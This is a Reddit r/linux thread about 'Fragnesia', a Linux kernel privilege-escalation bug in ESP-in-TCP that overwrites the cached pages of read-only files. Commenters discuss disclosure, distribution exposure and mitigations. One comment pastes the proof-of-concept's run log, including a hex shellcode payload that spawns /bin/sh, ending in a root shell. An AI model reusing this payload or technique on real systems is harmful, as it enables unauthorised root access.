Fragnesia: ANOTHER Linux Security Vulnerability!
Posted by HUSKYSPIN@reddit | linux | View on Reddit | 37 comments
Another Linux vulnerability in the same category as Dirty Frag has been found! Another eight of these more I guess? In any case the fatigue is coming up for me. Things are getting crazy!
"It abuses a logic bug in the Linux XFRM ESP-in-TCP subsystem to achieve arbitrary byte writes into the kernel page cache of read-only files, without requiring any race condition."
American_Jesus@reddit
2026 the year of Linux ~~desktop~~ exploits
PrimusSkeeter@reddit
Exploits will always be discovered. I would worry more if no exploits are ever discovered, because nothing is perfect.
shroddy@reddit
It seems to me more and more that the Linux kernel is no longer capable of providing a proper security boundary, at least not without an extensive amount of hardening that only Android achieved so far.
anto77_butt_kinkier@reddit
If windows was open source and AI's were able to scan through every byte of its source code, look at different implementation of its various subsystems, etc then we would be seeing this same amount of security vulnerabilities being discovered. At the very least Linux is having these discovered, published, and mitigated. Meanwhile windows, MacOS, iOS, etc vulns are somewhat harder to find but are just as numerous. Meaning that while Linux (really any open-source OS) is able to discover and patch all of these, closed source OS's are relying more on security through obscurity. Essentially just hoping that the "good guys" find the vulnerability before the "bad guys".
hpxvzhjfgb@reddit
windows 11 has already had over 150 privilege escalation bugs this year alone.
snail1132@reddit
How many have been patched?
hpxvzhjfgb@reddit
this number is a rough estimate I took from articles summarising patch notes for each month. but I also saw that there was one called RedSun found about a month ago that is still fully unpatched.
telmo_trooper@reddit
That is not the problem at all. It's a huge open source project with a bunch of manual memory operations that is being thoroughly scanned by fuzzing tools. Things are likely to stabilize soon, in the meantime there's not much we can do.
Scoutron@reddit
If you are completely sensationalized you may come to that conclusion
AtlanticPortal@reddit
On Debian 13, by default, it doesn't work. At least I keep having reasons not to use Ubuntu.
FLMKane@reddit
Elaborate?
AtlanticPortal@reddit
Debian does not have its kernel compiled with the CONFIG_INET_ESPINTCP option set. This variant uses the ESP_IN_TCP (basically the IPSEC protocol inside a TCP packet instead of a UDP packet) but if the support is not compiled into the kernel there is nothing to exploit.
FLMKane@reddit
Thanks.
fellipec@reddit
Run your system with NOPASSWD:ALL in the sudoers file and you'll never care about those vulnerabilities again.
Klutzy-Condition811@reddit
if you do that why not always run as root? Best of both worlds, no need for sudo, all the benefits of having all the privileges 😉
fellipec@reddit
Some software complain if you run as root (ask me how I know)
Journeyj012@reddit
i would ask more but it seems you don't know.
FLMKane@reddit
yay
Acidhawk_0@reddit
Or he didn't know .... but does now...
FLMKane@reddit
you use arch btw?
yay
daveedave@reddit
Cries in Raspberry
PusheenButtons@reddit
Cries in most cloud marketplace images
VisualMysterious1003@reddit
A result of Linus choosing stability over security.
Its becomes a serious liability now.
Riemero@reddit
Lol k
shroddy@reddit
I had to copy and paste you comment into another program to know if you wanted to write "its" but with a uppercase i or "Lts" but with lowercase L
(Both would be correct in this case)
DismalEggselent@reddit
So, is there any way that a change in the overall way that the page caching currently works could render this class of vulnerabilities moot?
BCMM@reddit
Do these AI companies just not do coordinated disclosure?
arades@reddit
Copyfail was coordinated, just a very short timeline. Dirtyfrag was coordinated, but attackers discovered the vulnerability just by analyzing commits to various kernel trees so they disclosed early.
The era of 90 day disclosure and systems already being fully patched before people know is probably gone. It's too easy to point an AI at git logs to find security patches, let alone finding new ones, for that long of a disclosure to matter.
The concept of coordinated disclosure also Isn't universally seen as more secure. Some security researchers lament them particularly for delaying action on critical issues.
bunkbail@reddit
doesnt seem to work on mine (chimera linux). it doesnt seem to have any root access still:
[*] smashing 192 bytes into read-only page cache  changed=176  skipped=16  remaining=00000  7f 45 4c 46 02 01 01 00  00 00 00 00 00 00 00 00Â0010  02 00 3e 00 01 00 00 00  78 00 40 00 00 00 00 00Â0020  40 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00Â0030  00 00 00 00 40 00 38 00  01 00 00 00 00 00 00 00Â0040  01 00 00 00 05 00 00 00  00 00 00 00 00 00 00 00Â0050  00 00 40 00 00 00 00 00  00 00 40 00 00 00 00 00Â0060  b8 00 00 00 00 00 00 00  b8 00 00 00 00 00 00 00Â0070  00 10 00 00 00 00 00 00  31 ff 31 f6 31 c0 b0 6aÂ0080  0f 05 b0 69 0f 05 b0 74  0f 05 6a 00 48 8d 05 12Â0090  00 00 00 50 48 89 e2 48  8d 3d 12 00 00 00 31 f6Â00a0  6a 3b 58 0f 05 54 45 52  4d 3d 78 74 65 72 6d 00Â00b0  2f 62 69 6e 2f 73 68 00  00 00 00 00 00 00 00 00Â[==================================================] 192/192 (100%)────────────────────────────────────────────────────────────sender_ns_uid=0 euid=0 prefix_send=18 splice_to_tcp=4096 file_off=188 file_off_next=4284[*] verifying 192 bytes...spintcp_enabled_after_queue=1[*] bytes_flip_summary len=192 changed=176 skipped=16[+] BUG: changed requested copied byte range to desired valuesbyte_flip_nonce=211 stream_byte=1cbyte_flip_packet_iv=cccccccc000000d3[*] [190/192] +00bd  1c -> 00  xor=1c seq=175 nonce=211firing espintcp splice...sender_ns_uid=0 euid=0 prefix_send=18 splice_to_tcp=4096 file_off=189 file_off_next=4285receiver_ns_uid=0 euid=0 espintcp_enabled_after_queue=1sender_status=0 receiver_status=0[+] smashed 1c -> 00  index=189 offset=+00bdbyte_flip_nonce=5 stream_byte=dbbyte_flip_packet_iv=cccccccc00000005[*] [191/192] +00be  db -> 00  xor=db seq=176 nonce=5firing espintcp splice...sender_ns_uid=0 euid=0 prefix_send=18 splice_to_tcp=4096 file_off=190 file_off_next=4286receiver_ns_uid=0 euid=0 espintcp_enabled_after_queue=1sender_status=0 receiver_status=0[+] smashed db -> 00  index=190 offset=+00bebyte_flip_nonce=51 stream_byte=c7byte_flip_packet_iv=cccccccc00000033[*] [192/192] +00bf  c7 -> 00  xor=c7 seq=177 nonce=51firing espintcp splice...sender_ns_uid=0 euid=0 prefix_send=18 splice_to_tcp=4096 file_off=191 file_off_next=4287receiver_ns_uid=0 euid=0 espintcp_enabled_after_queue=1sender_status=0 receiver_status=0[+] smashed c7 -> 00  index=191 offset=+00bf# iduid=0(root) gid=0(root) groups=65534(nogroup),0(root)# dmesgdmesg: read kernel buffer failed: Operation not permittedmoralesnery@reddit
The readme states that migitation measures are the same as for Dirty Frag.
AmarildoJr@reddit
But will the Kernel patch made for Dirty Frag mitigate this issue as well? Because blacklisting modules isn't really a permanent solution, specially for those that need it.
If the patch made for Dirty Frag doesn't work here then it should be classified as a critical vulnerability.
FiveGrayCats@reddit
Yep, and if dirty frag kernel patches fix this vulnerability, then it's the same vulnerability, and not capslocked ANOTHER...
ItzDerock@reddit
the tui in the poc video gives cyberpunk 2077 datamine ui vibes
Meuslon3D@reddit
i really love exploits where I first need to disable app armor to make them "work". Anyway, you can find almost infinite ways for local privilege escalation. This can turn out bad, but as long as there are any RCE-Exploits, most users are safe
AtlanticPortal@reddit
Well, that's what SELinux/AppArmor are for. Thankfully they work pretty well. Unfortunately many people disable them as soon as they install their machine.
dontquestionmyaction@reddit
Most distros ship with no Apparmor enforcement, so...
flying-sheep@reddit
Yeah, they still matter immensely for multi-user systems like HPC